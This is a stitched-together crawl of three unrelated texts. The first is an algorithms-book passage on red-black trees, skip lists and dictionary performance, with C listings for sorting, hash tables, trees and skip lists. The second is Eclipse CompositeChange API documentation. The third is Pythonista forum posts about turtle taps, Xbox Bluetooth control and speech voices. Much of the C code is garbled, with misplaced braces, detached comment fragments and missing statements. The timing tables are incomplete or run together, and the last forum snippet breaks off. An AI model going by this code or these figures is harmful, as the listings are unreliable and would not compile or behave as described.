Red parent, black uncle: Figure 3.7 illustrates a red-red violation, where the uncle is colored black. Here the nodes may be rotated, with the subtrees adjusted as shown. At this point the algorithm may terminate as there are no red-red conflicts and the top of the subtree (node A) is colored black. Note that if node X was originally a right child, a left rotation would be done first, making the node a left child.

Each adjustment made while inserting a node causes us to travel up the tree one step. At most one rotation (two if the node is a right child) will be done, as the algorithm terminates in this case. The technique for deletion is similar.

Implementation

An ANSI-C implementation of a red-black tree may be found in Section 4.7. Typedef T and comparison operators CompLT and CompEQ should be altered to reflect the data stored in the tree. Each Node consists of Left, Right and Parent pointers designating each child and the parent. The node color is stored in Color, and is either Red or Black. The data is stored in the Data field. All leaf nodes of the tree are Sentinel nodes, to simplify coding. The tree is based at Root, and initially is a Sentinel node.

InsertNode allocates a new node and inserts it in the tree. Subsequently, it calls InsertFixup to ensure that the red-black tree properties are maintained. DeleteNode deletes a node from the tree. To maintain red-black tree properties, DeleteFixup is called. FindNode searches the tree for a particular value.

3.4 Skip Lists

Skip lists are linked lists that allow you to skip to the correct node. Thus the performance bottleneck inherent in a sequential scan is avoided, while insertion and deletion remain relatively efficient. Average search time is O(lg n). Worst-case search time is O(n), but is extremely unlikely. An excellent reference for skip lists is Pugh[5].

Theory

The indexing scheme employed in skip lists is similar in nature to the method used to look up names in an address book. To look up a name, you index to the tab representing the first character of the desired entry. In Figure 3.8, for example, the top-most list represents a simple linked list with no tabs. Adding tabs (middle figure) facilitates the search. In this case, level-1 pointers are traversed. Once the correct segment of the list is found, level-0 pointers are traversed to find the specific entry.

The indexing scheme may be extended as shown in the bottom figure, where we now have an index to the index. To locate an item, level-2 pointers are traversed until the correct segment of the list is found, then level-1 and finally level-0 pointers are followed. When a new node is inserted, its level must be chosen, and this is done with the equivalent of a coin toss: the coin is tossed to determine if the node should be level-1. If you win, the coin is tossed again to determine if the node should be level-2. Another win, and the coin is tossed to determine if the node should be level-3. This process repeats until you lose.

The skip list algorithm has a probabilistic component, and thus has a probabilistic bound on the time required to execute. However, these bounds are quite tight in normal circumstances. For example, to search a list containing 1000 items, the probability that search time will be 5 times the average is about 1 in 1,000,000,000,000,000,000[5].
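As a concrete illustration of the coin-toss scheme just described, a minimal C sketch for picking the level of a new node is shown below. It mirrors the approach used in the listing in Section 4.8; the MAXLEVEL cap and the use of rand() are taken from that listing.

#include <stdlib.h>

#define MAXLEVEL 15

/* Toss a "coin" repeatedly: each win (probability 1/2) raises the
 * level of the new node by one, up to a fixed maximum. */
static int RandomLevel(void)
{
    int level = 0;
    while (rand() < RAND_MAX / 2 && level < MAXLEVEL)
        level++;
    return level;
}

A node that comes out at level k carries k + 1 forward pointers (levels 0 through k), which is what produces the 1/2, 1/4, ... distribution of pointer counts discussed in the comparison below.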
Figure 3.8: Skip List Construction

Implementation

An ANSI-C implementation of a skip list may be found in Section 4.8. Typedef T and comparison operators CompLT and CompEQ should be altered to reflect the data stored in the list. In addition, MAXLEVEL should be set based on the maximum size of the dataset.

To initialize, InitList is called. The list header is allocated and initialized. To indicate an empty list, all levels are set to point to the header. InsertNode allocates a new node and inserts it in the list. InsertNode first searches for the correct insertion point. While searching, the update array maintains pointers to the upper-level nodes encountered. This information is subsequently used to establish correct links for the newly inserted node. NewLevel is determined using a random number generator, and the node allocated. The forward links are then established using information from the update array. DeleteNode deletes and frees a node, and is implemented in a similar manner. FindNode searches the list for a particular value.

3.5 Comparison of Methods

We have seen several ways to construct dictionaries: hash tables, unbalanced binary search trees, red-black trees and skip lists. There are several factors that influence the choice of an algorithm:

Space. The amount of memory required per node differs from one method to the next. This is especially true if many small nodes are to be allocated.

For hash tables, only one forward pointer per node is required. In addition, the hash table itself must be allocated.

For red-black trees, each node has a left, right and parent pointer. In addition, the color of each node must be recorded. Although this requires only one bit, more space may be allocated to ensure that the size of the structure is properly aligned. Thus, each node in a red-black tree requires enough space for 3-4 pointers.

For skip lists, each node has a level-0 forward pointer. The probability of having a level-1 pointer is 1/2. The probability of having a level-2 pointer is 1/4. In general, a node has about two forward pointers on average (1 + 1/2 + 1/4 + ... = 2).

Time. The algorithm should be efficient. This is especially true if a large dataset is expected. Table 3.2 compares the search time for each algorithm. Note that worst-case behavior for hash tables and skip lists is extremely unlikely. Actual timing tests are described below.

Simplicity. If the algorithm is short and easy to understand, fewer mistakes may be made. This not only makes your life easy, but the maintenance programmer entrusted with the task of making repairs will appreciate any efforts you make in this area. The number of statements required for each algorithm is listed in Table 3.2.

method           statements  average time  worst-case time
hash table       26          O(1)          O(n)
unbalanced tree  41          O(lg n)       O(n)
red-black tree   120         O(lg n)       O(lg n)
skip list        55          O(lg n)       O(n)

Table 3.2: Comparison of Dictionaries

Average time for insert, search and delete operations on a database of 65,536 (2^16) randomly input items may be found in Table 3.3. For this test the hash table size was 10,009 and 16 index levels were allowed for the skip list. While there is some variation in the timings for the four methods, they are close enough so that other considerations should come into play when selecting an algorithm.

method           insert  search  delete
hash table       18      8       10
unbalanced tree  37      17      26
red-black tree   40      16      37
skip list        48      31

Table 3.3: Average Time (ms), 65536 Items, Random Input

Table 3.4 shows the average search time for two sets of data: a random set, where all values are unique, and an ordered set, where values are in ascending order. Ordered input creates a worst-case scenario for unbalanced tree algorithms, as the tree ends up being a simple linked list.
The times shown are for a single search operation. If we were to search for all items in a database of 65,536 values, a red-black tree algorithm would take .6seconds, while an unbalanc ed tree algorithm would take 1 hour. counthash tableunbalanced treered-black treeskip list164325random2563449input4,0963761265,536 631,03361165,536755,019915Table 3.4: Average Search Time (us) 1. Code Listings a) Insertion Sort Code typedef int T; typedef int TblIndex; #define CompGT(a,b) (a > b) void InsertSort(T *Lb, T *Ub) { T V, *I, *J, *Jmin; /************************ * Sort Array[Lb..Ub] * ************************/ Jmin = Lb - 1; for (I = Lb + 1; I <= Ub; I++) { V = *I; /* Shift elements down until */ /* insertion point found. */ for (J = I-1; J != Jmin && CompGT(*J, V); J--) *(J+1) = *J; *(J+1) = V; a) typedef int T; typedef int TblIndex; #define CompGT(a,b) (a > b) void ShellSort(T *Lb, T *Ub) { TblIndex H, N; T V, *I, *J, *Min; /************************** * Sort array A[Lb..Ub] * **************************/ /* compute largest increment */ N = Ub - Lb + 1; H = 1; if (N < 14) H = 1; else if (sizeof(TblIndex) == 2 && N > 29524) H = 3280; else { while (H < N) H = 3*H + 1; H /= 3; H /= 3; } while (H > 0) { /* sort-by-insertion in increments of H */ /* Care must be taken for pointers that */ /* wrap through zero. */ Min = Lb + H; for (I = Min; I <= Ub; I++) { V = *I; for (J = I-H; CompGT(*J, V); J -= H) { *(J+H) = *J; if (J <= Min) { J -= H; break; } } *(J+H) = V; } /* compute next increment */ H /= 3; Quicksort Code typedef int T; typedef int TblIndex; #define CompGT(a,b) (a > b) T *Partition(T *Lb, T *Ub) { T V, Pivot, *I, *J, *P; unsigned int Offset; /***************************** * partition Array[Lb..Ub] * *****************************/ /* select pivot and exchange with 1st element */ Offset = (Ub - Lb)>>1; P = Lb + Offset; Pivot = *P; *P = *Lb; I = Lb + 1; J = Ub; while (1) { while (I < J && CompGT(Pivot, *I)) I++; while (J >= I && CompGT(*J, Pivot)) J--; if (I >= J) break; V = *I; *I = *J; *J = V; J--; I++; } /* pivot belongs in A[j] */ *Lb = *J; *J = Pivot; } return J; void QuickSort(T *Lb, T *Ub) { T *M; /************************** * Sort array A[Lb..Ub] * **************************/ while (Lb < Ub) { /* quickly sort short lists */ if (Ub - Lb <= 12) { InsertSort(Lb, Ub); return; } /* partition into two segments */ M = Partition (Lb, Ub); /* sort the smallest partition */ Qsort Code #include <limits.h> #define MAXSTACK (sizeof(size_t) * CHAR_BIT) static void Exchange(void *a, void *b, size_t size) { size_t i; /****************** * exchange a,b * ******************/ for (i = sizeof(int); i <= size; i += sizeof(int)) { int t = *((int *)a); *(((int *)a)++) = *((int *)b); *(((int *)b)++) = t; } for (i = i - sizeof(int) + 1; i <= size; i++) { char t = *((char *)a); *(((char *)a)++) = *((char *)b); *(((char *)b)++) = t; } void qsort(void *base, size_t nmemb, size_t size, int (*compar)(const void *, const void *)) { void *LbStack[MAXSTACK], *UbStack[MAXSTACK]; int sp; unsigned int Offset; /******************** * ANSI-C qsort() * ********************/ LbStack[0] = (char *)base; UbStack[0] = (char *)base + (nmemb-1)*size; for (sp = 0; sp >= 0; sp--) { char *Lb, *Ub, *M; char *P, *I, *J; Lb = LbStack[sp]; Ub = UbStack[sp]; while (Lb < Ub) { /* select pivot and exchange with 1st element */ Offset = (Ub - Lb) >> 1; P = Lb + Offset - Offset % size; Exchange (Lb, P, size); /* partition into two segments */ I = Lb + size; J = Ub; while (1) { while (I < J && compar(Lb, I) > 0) I += size; while (J >= I && 
compar(J, Lb) > 0) J -= size; if (I >= J) break; Exchange (I, J, size); J -= size; I += size; /* pivot belongs in A[j] */ Exchange (Lb, J, size); M = J; /* keep processing smallest segment, and stack largest */ if (M - Lb <= Ub - M) { if (M + size < Ub) { LbStack[sp] = M + size; UbStack[sp++] = Ub; } Ub = M - size; } else { if (M - size > Lb) { LbStack[sp] = Lb; UbStack[sp++] = M - size; } Lb = M + size; } } a) #include <stdlib.h> #include <stdio.h> /* modify these lines to establish data type */ typedef int T; #define CompEQ(a,b) (a == b) typedef struct Node_ { struct Node_ *Next; T Data; } Node; typedef int HashTableIndex; Node **HashTable; int HashTableSize; HashTableIndex Hash(T Data) { /* division method */ return (Data % HashTableSize); } Node *InsertNode(T Data) { Node *p, *p0; HashTableIndex bucket; /* insert node at beginning of list */ bucket = Hash(Data); if ((p = malloc(sizeof(Node))) == 0) { fprintf (stderr, "out of memory (InsertNode)\n"); exit(1); } p0 = HashTable[bucket]; /* next node */ /* data stored in node */ void DeleteNode(T Data) { Node *p0, *p; HashTableIndex bucket; /* find node */ p0 = 0; bucket = Hash(Data); p = HashTable[bucket]; while (p && !CompEQ(p->Data, Data)) { p0 = p; p = p->Next; } if (!p) return; /* p designates node to delete, remove it from list */ if (p0) /* not first node, p0 points to previous node */ p0->Next = p->Next; else /* first node on chain */ HashTable[bucket] = p->Next; } free (p); Node *FindNode (T Data) { Node *p; p = HashTable[Hash(Data)]; while (p && !CompEQ(p->Data, Data)) p = p->Next; return p; } a) Binary Search Tree Code #include <stdio.h> #include <stdlib.h> /* modify these lines to establish data type */ typedef int T; #define CompLT(a,b) (a < b) #define CompEQ(a,b) (a == b) typedef struct Node_ { struct Node_ *Left; struct Node_ *Right; struct Node_ *Parent; T Data; } Node; Node *Root = NULL; Node *InsertNode(T Data) { Node *X, *Current, *Parent; /* /* /* /* left child */ right child */ parent */ data stored in node */ /*********************************************** * allocate node for Data and insert in tree * ***********************************************/ /* setup new node */ if ((X = malloc (sizeof(*X))) == 0) { fprintf (stderr, "insufficient memory (InsertNode)\n"); exit(1); } X->Data = Data; X->Left = NULL; X->Right = NULL; /* find X's parent */ Current = Root; Parent = 0; while (Current) { if (CompEQ(X->Data, Current->Data)) return (Current); Parent = Current; Current = CompLT(X->Data, Current->Data) ? Current->Left : Current->Right; } X->Parent = Parent; /* insert X in tree */ if(Parent) if(CompLT(X->Data, Parent->Data)) Parent->Left = X; else Parent->Right = X; else Root = X; return(X); } void DeleteNode(Node *Z) { Node *X, *Y; /***************************** * delete node Z from tree * *****************************/ /* Y will be removed from the parent chain */ if (!Z || Z == NULL) return; /* find tree successor */ if (Z->Left == NULL || Z->Right == NULL) Y = Z; else { Y = Z->Right; while (Y->Left != NULL) Y = Y->Left; } /* X is Y's only child */ if (Y->Left != NULL) X = Y->Left; else X = Y->Right; /* remove Y from the parent chain */ if (X) X->Parent = Y->Parent; if (Y->Parent) if (Y == Y->Parent->Left) Y->Parent->Left = X; else Y->Parent->Right = X; else Root = X; /* /* /* if Y is the node we're removing */ Z is the data we're removing */ if Z and Y are not the same, replace Z with Y. 
*/
    if (Y != Z) {
        Y->Left = Z->Left;
        if (Y->Left) Y->Left->Parent = Y;
        Y->Right = Z->Right;
        if (Y->Right) Y->Right->Parent = Y;
        Y->Parent = Z->Parent;
        if (Z->Parent)
            if (Z == Z->Parent->Left)
                Z->Parent->Left = Y;
            else
                Z->Parent->Right = Y;
        else
            Root = Y;
        free (Z);
    } else {
        free (Y);
    }
}

Node *FindNode(T Data) {
   /*******************************
    *  find node containing Data  *
    *******************************/
    Node *Current = Root;
    while(Current != NULL)
        if(CompEQ(Data, Current->Data))
            return (Current);
        else
            Current = CompLT (Data, Current->Data) ?
                Current->Left : Current->Right;
    return(0);
}

Red-Black Tree Code

#include <stdlib.h>
#include <stdio.h>

/* modify these lines to establish data type */
typedef int T;
#define CompLT(a,b) (a < b)
#define CompEQ(a,b) (a == b)

/* red-black tree description */
typedef enum { Black, Red } NodeColor;

typedef struct Node_ {
    struct Node_ *Left;    /* left child */
    struct Node_ *Right;   /* right child */
    struct Node_ *Parent;  /* parent */
    NodeColor Color;       /* node color (black, red) */
    T Data;                /* data stored in node */
} Node;

#define NIL &Sentinel      /* all leafs are sentinels */
Node Sentinel = { NIL, NIL, 0, Black, 0};

Node *Root = NIL;          /* root of red-black tree */

Node *InsertNode(T Data) {
    Node *Current, *Parent, *X;

   /***********************************************
    *  allocate node for Data and insert in tree  *
    ***********************************************/

    /* setup new node */
    if ((X = malloc (sizeof(*X))) == 0) {
        printf ("insufficient memory (InsertNode)\n");
        exit(1);
    }
    X->Data = Data;
    X->Left = NIL;
    X->Right = NIL;
    X->Parent = 0;
    X->Color = Red;

    /* find where node belongs */
    Current = Root;
    Parent = 0;
    while (Current != NIL) {
        if (CompEQ(X->Data, Current->Data)) return (Current);
        Parent = Current;
        Current = CompLT(X->Data, Current->Data) ?
            Current->Left : Current->Right;
    }

    /* insert node in tree */
    if(Parent) {
        if(CompLT(X->Data, Parent->Data))
            Parent->Left = X;
        else
            Parent->Right = X;
        X->Parent = Parent;
    } else
        Root = X;

    InsertFixup(X);
    return(X);
}

void InsertFixup(Node *X) {
   /*************************************
    *  maintain red-black tree balance  *
    *  after inserting node X           *
    *************************************/

    /* check red-black properties */
    while (X != Root && X->Parent->Color == Red) {
        /* we have a violation */
        if (X->Parent == X->Parent->Parent->Left) {
            Node *Y = X->Parent->Parent->Right;
            if (Y->Color == Red) {
                /* uncle is red */
                X->Parent->Color = Black;
                Y->Color = Black;
                X->Parent->Parent->Color = Red;
                X = X->Parent->Parent;
            } else {
                /* uncle is black */
                if (X == X->Parent->Right) {
                    /* make X a left child */
                    X = X->Parent;
                    RotateLeft(X);
                }
                /* recolor and rotate */
                X->Parent->Color = Black;
                X->Parent->Parent->Color = Red;
                RotateRight(X->Parent->Parent);
            }
        } else {
            /* mirror image of above code */
            Node *Y = X->Parent->Parent->Left;
            if (Y->Color == Red) {
                /* uncle is red */
                X->Parent->Color = Black;
                Y->Color = Black;
                X->Parent->Parent->Color = Red;
                X = X->Parent->Parent;
            } else {
                /* uncle is black */
                if (X == X->Parent->Left) {
                    X = X->Parent;
                    RotateRight(X);
                }
                X->Parent->Color = Black;
                X->Parent->Parent->Color = Red;
                RotateLeft(X->Parent->Parent);
            }
        }
    }
    Root->Color = Black;
}

void RotateLeft(Node *X) {
   /**************************
    *  rotate Node X to left *
    **************************/
    Node *Y = X->Right;

    /* establish X->Right link */
    X->Right = Y->Left;
    if (Y->Left != NIL) Y->Left->Parent = X;

    /* establish Y->Parent link */
    if (Y != NIL) Y->Parent = X->Parent;
    if (X->Parent) {
        if (X == X->Parent->Left)
            X->Parent->Left = Y;
        else
            X->Parent->Right = Y;
    } else {
        Root = Y;
    }

    /* link X and Y */
    Y->Left = X;
    if (X != NIL) X->Parent = Y;
}

void RotateRight(Node *X) {
   /****************************
    *  rotate Node X to right  *
    ****************************/
    Node *Y = X->Left;

    /* establish X->Left link */
    X->Left = Y->Right;
    if (Y->Right != NIL) Y->Right->Parent = X;

    /* establish Y->Parent link */
    if (Y != NIL) Y->Parent = X->Parent;
    if (X->Parent) {
        if (X == X->Parent->Right)
            X->Parent->Right = Y;
        else
            X->Parent->Left = Y;
    } else {
        Root = Y;
    }

    /* link X and Y */
    Y->Right = X;
    if (X != NIL) X->Parent = Y;
}

void DeleteNode(Node *Z) {
    Node *X, *Y;

   /*****************************
    *  delete node Z from tree  *
    *****************************/

    if (!Z || Z == NIL) return;

    if (Z->Left == NIL || Z->Right == NIL) {
        /* Y has a NIL node as a child */
        Y = Z;
    } else {
        /* find tree successor with a NIL node as a child */
        Y = Z->Right;
        while (Y->Left != NIL) Y = Y->Left;
    }

    /* X is Y's only child */
    if (Y->Left != NIL)
        X = Y->Left;
    else
        X = Y->Right;

    /* remove Y from the parent chain */
    X->Parent = Y->Parent;
    if (Y->Parent)
        if (Y == Y->Parent->Left)
            Y->Parent->Left = X;
        else
            Y->Parent->Right = X;
    else
        Root = X;

    if (Y != Z) Z->Data = Y->Data;
    if (Y->Color == Black)
        DeleteFixup (X);
    free (Y);
}

void DeleteFixup(Node *X) {
   /*************************************
    *  maintain red-black tree balance  *
    *  after deleting node X            *
    *************************************/

    while (X != Root && X->Color == Black) {
        if (X == X->Parent->Left) {
            Node *W = X->Parent->Right;
            if (W->Color == Red) {
                W->Color = Black;
                X->Parent->Color = Red;
                RotateLeft (X->Parent);
                W = X->Parent->Right;
            }
            if (W->Left->Color == Black && W->Right->Color == Black) {
                W->Color = Red;
                X = X->Parent;
            } else {
                if (W->Right->Color == Black) {
                    W->Left->Color = Black;
                    W->Color = Red;
                    RotateRight (W);
                    W = X->Parent->Right;
                }
                W->Color = X->Parent->Color;
                X->Parent->Color = Black;
                W->Right->Color = Black;
                RotateLeft (X->Parent);
                X = Root;
            }
        } else {
            Node *W = X->Parent->Left;
            if (W->Color == Red) {
                W->Color = Black;
                X->Parent->Color = Red;
                RotateRight (X->Parent);
                W = X->Parent->Left;
            }
            if (W->Right->Color == Black && W->Left->Color == Black) {
                W->Color = Red;
                X = X->Parent;
            } else {
                if (W->Left->Color == Black) {
                    W->Right->Color = Black;
                    W->Color = Red;
                    RotateLeft (W);
                    W = X->Parent->Left;
                }
                W->Color = X->Parent->Color;
                X->Parent->Color = Black;
                W->Left->Color = Black;
                RotateRight (X->Parent);
                X = Root;
            }
        }
    }
    X->Color = Black;
}

Node *FindNode(T Data) {
   /*******************************
    *  find node containing Data  *
    *******************************/
    Node *Current = Root;
    while(Current != NIL)
        if(CompEQ(Data, Current->Data))
            return (Current);
        else
            Current = CompLT (Data, Current->Data) ?
                Current->Left : Current->Right;
    return(0);
}

Skip List Code

#include <stdio.h>
#include <stdlib.h>

/* define data-type and compare operators here */
typedef int T;
#define CompLT(a,b) (a < b)
#define CompEQ(a,b) (a == b)

/* levels range from (0 .. MAXLEVEL) */
#define MAXLEVEL 15

typedef struct Node_ {
    T Data;                    /* user's data */
    struct Node_ *Forward[1];  /* skip list forward pointer */
} Node;

typedef struct {
    Node *Hdr;
    int ListLevel;
} SkipList;

SkipList List;

#define NIL List.Hdr

void InitList() {
    int i;

   /**************************
    *  initialize skip list  *
    **************************/

    if ((List.Hdr = malloc(sizeof(Node) + MAXLEVEL*sizeof(Node *))) == 0) {
        printf ("insufficient memory (InitList)\n");
        exit(1);
    }
    for (i = 0; i <= MAXLEVEL; i++)
        List.Hdr->Forward[i] = NIL;
    List.ListLevel = 0;
}

Node *InsertNode(T Data) {
    int i, NewLevel;
    Node *update[MAXLEVEL+1];
    Node *X;

   /***********************************************
    *  allocate node for Data and insert in list  *
    ***********************************************/

    /* find where data belongs */
    X = List.Hdr;
    for (i = List.ListLevel; i >= 0; i--) {
        while (X->Forward[i] != NIL && CompLT(X->Forward[i]->Data, Data))
            X = X->Forward[i];
        update[i] = X;
    }
    X = X->Forward[0];
    if (X != NIL && CompEQ(X->Data, Data)) return(X);

    /* determine level */
    NewLevel = 0;
    while (rand() < RAND_MAX/2) NewLevel++;
    if (NewLevel > MAXLEVEL) NewLevel = MAXLEVEL;

    if (NewLevel > List.ListLevel) {
        for (i = List.ListLevel + 1; i <= NewLevel; i++)
            update[i] = NIL;
        List.ListLevel = NewLevel;
    }

    /* make new node */
    if ((X = malloc(sizeof(Node) + NewLevel*sizeof(Node *))) == 0) {
        printf ("insufficient memory (InsertNode)\n");
        exit(1);
    }
    X->Data = Data;

    /* update forward links */
    for (i = 0; i <= NewLevel; i++) {
        X->Forward[i] = update[i]->Forward[i];
        update[i]->Forward[i] = X;
    }
    return(X);
}

void DeleteNode(T Data) {
    int i;
    Node *update[MAXLEVEL+1], *X;

   /*******************************************
    *  delete node containing Data from list  *
    *******************************************/

    /* find where data belongs */
    X = List.Hdr;
    for (i = List.ListLevel; i >= 0; i--) {
        while (X->Forward[i] != NIL && CompLT(X->Forward[i]->Data, Data))
            X = X->Forward[i];
        update[i] = X;
    }
    X = X->Forward[0];
    if (X == NIL || !CompEQ(X->Data, Data)) return;

    /* adjust forward pointers */
    for (i = 0; i <= List.ListLevel; i++) {
        if (update[i]->Forward[i] != X) break;
        update[i]->Forward[i] = X->Forward[i];
    }

    free (X);

    /* adjust header level */
    while ((List.ListLevel > 0) && (List.Hdr->Forward[List.ListLevel] == NIL))
        List.ListLevel--;
}

Node *FindNode(T Data) {
    int i;
    Node *X = List.Hdr;

   /*******************************
    *  find node containing Data  *
    *******************************/

    for (i = List.ListLevel; i >= 0; i--) {
        while (X->Forward[i] != NIL && CompLT(X->Forward[i]->Data, Data))
            X = X->Forward[i];
    }
    X = X->Forward[0];
    if (X != NIL && CompEQ(X->Data, Data)) return (X);
    return(0);
}

1. Bibliography

[1] Donald E. Knuth. The Art of Computer Programming, volume 3. Massachusetts: Addison-Wesley, 1973.
[2] Thomas H. Cormen, Charles E. Leiserson, and Ronald L. Rivest. Introduction to Algorithms. New York: McGraw-Hill, 1992.
[3] Alfred V. Aho, John E. Hopcroft, and Jeffrey D. Ullman. Data Structures and Algorithms. Massachusetts: Addison-Wesley, 1983.
[4] Peter K. Pearson. Fast hashing of variable-length text strings. Communications of the ACM, 33(6):677-680, June 1990.
[5] William Pugh. Skip lists: A probabilistic alternative to balanced trees. Communications of the ACM, 33(6):668-676, June 1990.
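To show how the skip list listing above is meant to be driven, here is a small test harness. It is not part of the original text, just a sketch appended after the listing; it assumes the skip list code is compiled on its own (the red-black tree listing defines functions with the same names, so the two listings belong in separate files).

/* minimal driver for the skip list listing above (illustrative only) */
int main(void) {
    int i;
    Node *n;

    InitList();
    for (i = 0; i < 10; i++)
        InsertNode(i * 7 % 10);   /* insert keys in scrambled order */

    n = FindNode(6);
    printf("6 %s\n", n ? "found" : "not found");

    DeleteNode(6);
    n = FindNode(6);
    printf("after delete, 6 %s\n", n ? "found" : "not found");
    return 0;
}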
https://ru.scribd.com/document/128681723/Algorithm-Book
CC-MAIN-2019-47
en
refinedweb
Class CompositeChange
- java.lang.Object
- org.eclipse.ltk.core.refactoring.Change
- org.eclipse.ltk.core.refactoring.CompositeChange
- All Implemented Interfaces: IAdaptable

public class CompositeChange extends Change

Represents a composite change. Composite changes can be marked as synthetic. A synthetic composite change might not be rendered in the refactoring preview tree to save display real estate. Clients may subclass this class.

Constructor Detail

CompositeChange
public CompositeChange(String name)
Creates a new composite change with the given name.
- Parameters: name - the human readable name of the change. Will be used to display the change in the user interface

CompositeChange
public CompositeChange(String name, Change[] children)
Creates a new composite change with the given name and array of children.
- Parameters: name - the human readable name of the change. Will be used to display the change in the user interface
  children - the initial array of children

Method Detail

isSynthetic
public boolean isSynthetic()
Returns whether this change is synthetic or not.
- Returns: true if this change is synthetic; otherwise false

markAsSynthetic
public void markAsSynthetic()
Marks this change as synthetic.

getName
public String getName()
Returns the human readable name of this change. The name MUST not be null.

add
public void add(Change change)
Adds the given change to the list of children. The change to be added can be null. Adding a "null" change does nothing.
- Parameters: change - the change to add

addAll
public void addAll(Change[] changes)
Adds all changes in the given array to the list of children.
- Parameters: changes - the changes to add

merge
public void merge(CompositeChange change)
Merges the children of the given composite change into this change. This means the changes are removed from the given composite change and added to this change.
- Parameters: change - the change to merge

remove
public boolean remove(Change change)
Removes the given change from the list of children.
- Parameters: change - the change to remove
- Returns: true if the change contained the given child; otherwise false is returned

clear
public Change[] clear()
Removes all changes from this composite change.
- Returns: the list of changes removed from this composite change
- Since: 3.1

getChildren
public Change[] getChildren()
Returns the children managed by this composite change.
- Returns: the children of this change or an empty array if no children exist

setEnabled
public void setEnabled(boolean enabled)
Sets whether this change is enabled or not. The composite change sends setEnabled to all its children. Clients are allowed to extend this method.
- Overrides: setEnabled in class Change
- Parameters: enabled - true to enable this change; false otherwise.

initializeValidationData
The composite change sends initializeValidationData to all its children. Clients are allowed to extend this method.

isValid
The composite change sends isValid to all its children until the first one returns a status with a severity of FATAL. If one of the children throws an exception the remaining children will not receive the isValid call. Clients are allowed to extend this method.
- Specified by: isValid in class Change
- Parameters: pm - a progress monitor.
- Returns: a refactoring status describing the outcome of the validation check
- Throws: CoreException - if an error occurred during the validation check. The change is to be treated as invalid if an exception occurs.

perform
The composite change sends perform to all its enabled children. If one of the children throws an exception the remaining children will not receive the perform call. In this case the method getUndoUntilException can be used to get an undo object containing the undo objects of all executed children. Clients are allowed to extend this method.
- Specified by: perform in class Change
- Parameters: pm - a progress monitor
- Returns: the undo change for this change object or null if no undo is provided
- Throws: CoreException - if an error occurred during change execution

internalHandleException
protected void internalHandleException(Change change, Throwable t)
Note: this is an internal method and should not be overridden outside of the refactoring framework. The method gets called if one of the changes managed by this composite change generates an exception when performed.
- Parameters: change - the change that caused the exception
  t - the exception itself
- Restriction: This method is not intended to be referenced by clients.

internalContinueOnCancel
protected boolean internalContinueOnCancel()
Note: this is an internal method and should not be overridden outside of the refactoring framework. The method gets called if one of the changes managed by this composite change generates an operation canceled exception when performed.
- Returns: true if performing the change should continue on cancel; otherwise false
- Since: 3.1
- Restriction: This method is not intended to be referenced by clients.

internalProcessOnCancel
protected boolean internalProcessOnCancel(Change change)
Note: this is an internal method and should not be overridden outside of the refactoring framework. The method gets called if the execution of this change got canceled, but internalContinueOnCancel returned true.
- Parameters: change - the change to perform
- Returns: true if the given change should be performed although the execution got canceled; otherwise false
- Since: 3.1
- Restriction: This method is not intended to be referenced by clients.

dispose
public void dispose()
Disposes this change. Subclasses that override this method typically unregister listeners which got registered during the call to initializeValidationData. Subclasses may override this method. The composite change sends dispose to all its children. It is guaranteed that all children receive the dispose call.

getUndoUntilException
public Change getUndoUntilException()
Returns the undo object containing all undo changes of those children that got successfully executed while performing this change. Returns null if all changes were executed successfully or if there's nothing to undo. This method is not intended to be overridden or extended.
- Returns: the undo object containing all undo changes of those children that got successfully executed while performing this change, or null if all changes were executed successfully or if there's nothing to undo.

createUndoChange
protected Change createUndoChange(Change[] childUndos)
Hook to create an undo change. The method should be overridden by clients which provide their own composite change to create a corresponding undo change.
- Parameters: childUndos - the child undos. The undo edits appear in the list in the reverse order of their execution. So the first change in the array is the undo change of the last change that got executed.
- Returns: the undo

getModifiedElement
public Object getModifiedElement()
Returns the element modified by this Change. The method may return null if the change isn't related to an element.
- Specified by: getModifiedElement in class Change
- Returns: the element modified by this change.
- Since: 3.2
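As a quick illustration of how these methods fit together, here is a small sketch. It is not from the Eclipse documentation; the child changes passed in stand for whatever Change objects your refactoring has already produced (for example TextFileChange instances), and the class name is arbitrary.

import org.eclipse.ltk.core.refactoring.Change;
import org.eclipse.ltk.core.refactoring.CompositeChange;

public class ChangeAssembly {
    // Groups already-created child changes under one synthetic node,
    // the kind of object typically returned from Refactoring#createChange.
    public static Change assemble(String name, Change[] children) {
        CompositeChange root = new CompositeChange(name, children);
        root.markAsSynthetic();   // hide the grouping node in the preview tree
        root.add(null);           // adding null is documented as a no-op
        return root;
    }
}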
http://help.eclipse.org/2019-09/topic/org.eclipse.platform.doc.isv/reference/api/org/eclipse/ltk/core/refactoring/CompositeChange.html
CC-MAIN-2019-47
en
refinedweb
rex_noctis I have recently been messing around with the turtle module on PC and have come up with a few handy programs. I then became curious about the possibilities on Pythonista. I am attempting to make a simple program where the turtle will move to where the user taps. The onclick() does not seem to work. I will include the code I was trying to use below. How would I make a program like this, and is there any documentation on turtle in Pythonista (I couldn't find any)?

Code:

from turtle import *

speed(0)
screen = Screen()

def moveTo(x, y):
    setpos(x, y)

screen.onclick(moveTo)
screen.listen()

So long story short, I'm good at playing games with touch screen controls and I'm bad with an Xbox controller. However I like a lot of Xbox games, so this somewhat limits me. So I was wondering if there was some way I could write a program to connect to my Xbox via Bluetooth and then use custom controls (possibly made using the scene module) to control it instead of the usual physical controller. I'll divide this up into a few questions to make it a bit simpler. I know there is a sort of controller on the Xbox app but apparently that can't be used with games.
- Is there a module or other way to connect to more advanced devices via Bluetooth (the cb module says it's only for basic Bluetooth devices)?
- Would I be able to control the Xbox through this method without having to modify the Xbox in any way?
- If it's looking good so far, what are some of the pieces of code I would need to use (quite specifically)?
Thanks in advance.

rex_noctis @rex_noctis Did you try the 3 Australian voices?

speech: en-AU Objective-c: en-AU, Name: Catherine
speech: en-AU Objective-c: en-AU, Name: Gordon
speech: en-AU Objective-c: en-AU, Name: Karen

How do I determine between those in the speech.say() line, since they're all en-AU?

rex_noctis

rex_noctis So I am building a text to speech program. It currently says text in the default Daniel Enhanced voice. I want the program to say stuff in the Australian Male Siri voice. How would I do that? I have tried speech.say('Hello', 'en-AU') but this uses a different Australian voice. Please help.

rex_noctis Thanks, it's working now!

rex_noctis I just realised the error. It's meant to be Rect(self.player.position.x-12, self.player.position.y-12, 24, 24). I forgot the .x on the end of position. Thanks for making me notice it!
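For the tap-to-move question above, a common workaround on Pythonista is to skip turtle entirely and use the scene module, which delivers touch events directly. The sketch below is not from the thread, and the built-in texture name is an assumption that may need to be swapped for any image available on your device:

from scene import Scene, SpriteNode, Action, run

class TapToMove(Scene):
    def setup(self):
        # 'plf:AlienGreen_front' is assumed to be one of Pythonista's bundled textures
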